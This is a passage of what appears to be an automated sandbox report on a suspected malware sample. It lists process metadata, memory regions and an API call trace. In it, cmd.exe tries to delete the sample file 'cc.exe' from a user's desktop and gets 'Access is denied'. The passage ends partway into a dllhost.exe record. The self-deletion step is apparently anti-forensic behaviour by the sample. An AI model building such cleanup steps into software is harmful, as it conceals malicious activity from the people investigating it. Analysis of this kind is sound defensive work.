"0xfa0" cmd_line = "/c del \"C:\\Users\\kEecfMwgj\\Desktop\\cc.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1037 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1038 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1039 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1040 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1041 start_va = 0x90000 end_va = 0x93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 1042 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 1043 start_va = 0x150000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1044 start_va = 0x4a040000 end_va = 0x4a08bfff monitored = 1 entry_point = 0x4a04829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1045 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1046 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1047 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1048 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1049 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1050 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1051 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1052 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1053 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1054 start_va = 0x3c0000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1055 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1056 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1057 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1058 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1059 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1060 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1061 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 1062 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1063 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1064 start_va = 0x440000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1065 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1066 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1067 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1068 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1069 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1070 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1071 start_va = 0xb0000 end_va = 0x116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1072 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1073 start_va = 0x75220000 end_va = 0x75226fff monitored = 0 entry_point = 0x75221230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1074 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1075 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1076 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1077 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1078 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1079 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1080 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1081 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1082 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1083 start_va = 0x6b0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1084 start_va = 0x120000 end_va = 0x13dfff monitored = 0 entry_point = 0x13158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1085 start_va = 0x6b0000 end_va = 0x837fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1086 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1087 start_va = 0x120000 end_va = 0x13dfff monitored = 0 entry_point = 0x13158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1088 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1089 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1090 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1091 start_va = 0xa30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1092 start_va = 0x120000 end_va = 0x13ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 1093 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1094 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1095 start_va = 0x250000 end_va = 0x30ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 46 os_tid = 0xfb0 [0082.335] GetProcAddress (hModule=0x772b0000, lpProcName="SetConsoleInputExeNameW") returned 0x772da775 [0082.337] GetProcessHeap () returned 0x5b0000 [0082.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5c5a50 [0082.337] GetProcessHeap () returned 0x5b0000 [0082.337] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a50 | out: hHeap=0x5b0000) returned 1 [0082.338] _wcsicmp (_String1="del", _String2=")") returned 59 [0082.338] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0082.338] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0082.338] _wcsicmp (_String1="IF", _String2="del") returned 5 [0082.338] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0082.338] _wcsicmp (_String1="REM", _String2="del") returned 14 [0082.338] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0082.338] GetProcessHeap () returned 0x5b0000 [0082.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x58) returned 0x5c3160 [0082.338] GetProcessHeap () returned 0x5b0000 [0082.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5c0068 [0082.339] GetProcessHeap () returned 0x5b0000 [0082.339] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5c31c0 [0082.341] GetConsoleTitleW (in: lpConsoleTitle=0x24f598, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0082.341] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0082.341] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0082.341] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0082.341] GetProcessHeap () returned 0x5b0000 [0082.341] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9c) returned 0x5c3220 [0082.342] GetProcessHeap () returned 0x5b0000 [0082.342] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5c3220, Size=0x52) returned 0x5c3220 [0082.342] GetProcessHeap () returned 0x5b0000 [0082.342] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c3220) returned 0x52 [0082.344] GetProcessHeap () returned 0x5b0000 [0082.344] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5a) returned 0x5c3280 [0082.345] GetProcessHeap () returned 0x5b0000 [0082.345] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9c) returned 0x5c32e8 [0082.345] GetProcessHeap () returned 0x5b0000 [0082.345] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5c32e8, Size=0x52) returned 0x5c32e8 [0082.345] GetProcessHeap () returned 0x5b0000 [0082.345] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c32e8) returned 0x52 [0082.346] GetProcessHeap () returned 0x5b0000 [0082.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4c) returned 0x5c3348 [0082.346] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x24f350 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0082.346] GetProcessHeap () returned 0x5b0000 [0082.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x38) returned 0x5c1fb0 [0082.346] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x24e3e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0082.346] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e610, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x24e614, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e610*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0082.346] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0082.346] GetProcessHeap () returned 0x5b0000 [0082.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5c33a0 [0082.346] GetProcessHeap () returned 0x5b0000 [0082.347] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x258) returned 0x5c33d8 [0082.347] _wcsicmp (_String1="cc.exe", _String2=".") returned 53 [0082.347] _wcsicmp (_String1="cc.exe", _String2="..") returned 53 [0082.347] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe")) returned 0x20 [0082.347] GetProcessHeap () returned 0x5b0000 [0082.347] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5b07f0 [0082.347] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5b07f8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0082.347] SetErrorMode (uMode=0x0) returned 0x1 [0082.347] SetErrorMode (uMode=0x1) returned 0x0 [0082.347] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", nBufferLength=0x104, lpBuffer=0x24ea34, lpFilePart=0x24ea1c | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", lpFilePart=0x24ea1c*="cc.exe") returned 0x21 [0082.347] SetErrorMode (uMode=0x1) returned 0x1 [0082.347] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop" (normalized: "c:\\users\\keecfmwgj\\desktop")) returned 0x11 [0082.348] GetProcessHeap () returned 0x5b0000 [0082.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x258) returned 0x5b0a08 [0082.348] _wcsicmp (_String1="cc.exe", _String2=".") returned 53 [0082.348] _wcsicmp (_String1="cc.exe", _String2="..") returned 53 [0082.348] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe")) returned 0x20 [0082.348] GetProcessHeap () returned 0x5b0000 [0082.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x16) returned 0x5c3638 [0082.348] GetProcessHeap () returned 0x5b0000 [0082.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3e) returned 0x5c3658 [0082.348] GetProcessHeap () returned 0x5b0000 [0082.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3e) returned 0x5c36a0 [0082.348] GetProcessHeap () returned 0x5b0000 [0082.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x808) returned 0x5c4320 [0082.348] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", fInfoLevelId=0x0, lpFindFileData=0x5c432c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5c432c) returned 0x5c36e8 [0082.348] GetProcessHeap () returned 0x5b0000 [0082.348] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x14) returned 0x5c3728 [0082.349] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe")) returned 0 [0082.351] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe")) returned 0 [0082.351] GetLastError () returned 0x5 [0082.351] _vsnwprintf (in: _Buffer=0x4a074640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x24e920 | out: _Buffer="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe\r\n") returned 35 [0082.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0082.352] GetFileType (hFile=0x7) returned 0x2 [0082.352] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0082.353] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e8e0 | out: lpMode=0x24e8e0) returned 1 [0082.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0082.353] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a074640*, nNumberOfCharsToWrite=0x23, lpNumberOfCharsWritten=0x24e90c, lpReserved=0x0 | out: lpBuffer=0x4a074640*, lpNumberOfCharsWritten=0x24e90c*=0x23) returned 1 [0082.354] _get_osfhandle (_FileHandle=2) returned 0xb [0082.354] GetFileType (hFile=0xb) returned 0x2 [0082.354] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0082.354] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24e894 | out: lpMode=0x24e894) returned 1 [0082.354] _get_osfhandle (_FileHandle=2) returned 0xb [0082.354] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24e8c8 | out: lpConsoleScreenBufferInfo=0x24e8c8) returned 1 [0082.355] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a074640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0082.374] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a074640, nSize=0x2000, Arguments=0x24e908 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0082.374] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a074640*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x24e8ec, lpReserved=0x0 | out: lpBuffer=0x4a074640*, lpNumberOfCharsWritten=0x24e8ec*=0x13) returned 1 [0082.374] FindNextFileW (in: hFindFile=0x5c36e8, lpFindFileData=0x5c432c | out: lpFindFileData=0x5c432c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e909f00, ftCreationTime.dwHighDateTime=0x1d7b441, ftLastAccessTime.dwLowDateTime=0x7e909f00, ftLastAccessTime.dwHighDateTime=0x1d7b441, ftLastWriteTime.dwLowDateTime=0x949d6000, ftLastWriteTime.dwHighDateTime=0x1d7b43f, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cc.exe", cAlternateFileName="")) returned 0 [0082.375] GetLastError () returned 0x12 [0082.375] FindClose (in: hFindFile=0x5c36e8 | out: hFindFile=0x5c36e8) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c4320 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c36a0 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c3638 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c3658 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b0a08 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b07f0 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c33d8 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c33a0 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c1fb0 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c3348 | out: hHeap=0x5b0000) returned 1 [0082.375] GetProcessHeap () returned 0x5b0000 [0082.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c32e8 | out: hHeap=0x5b0000) returned 1 [0082.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0082.376] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0082.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0082.376] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0641ac | out: lpMode=0x4a0641ac) returned 1 [0082.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0082.376] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0641b0 | out: lpMode=0x4a0641b0) returned 1 [0082.376] SetConsoleInputExeNameW () returned 0x1 [0082.376] GetConsoleOutputCP () returned 0x1b5 [0082.377] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a064260 | out: lpCPInfo=0x4a064260) returned 1 [0082.377] SetThreadUILanguage (LangId=0x0) returned 0x409 [0082.377] exit (_Code=0) Process: id = "6" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x13c19000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7907 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7908 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7909 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7910 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 7911 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 7912 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 7913 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 7914 start_va = 0x190000 end_va = 0x1f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7915 start_va = 0x280000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7916 start_va = 0x380000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 7917 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 7918 start_va = 0x540000 end_va = 0x6c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 7919 start_va = 0x6d0000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 7920 start_va = 0x860000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 7921 start_va = 0x1c60000 end_va = 0x1d3efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c60000" filename = "" Region: id 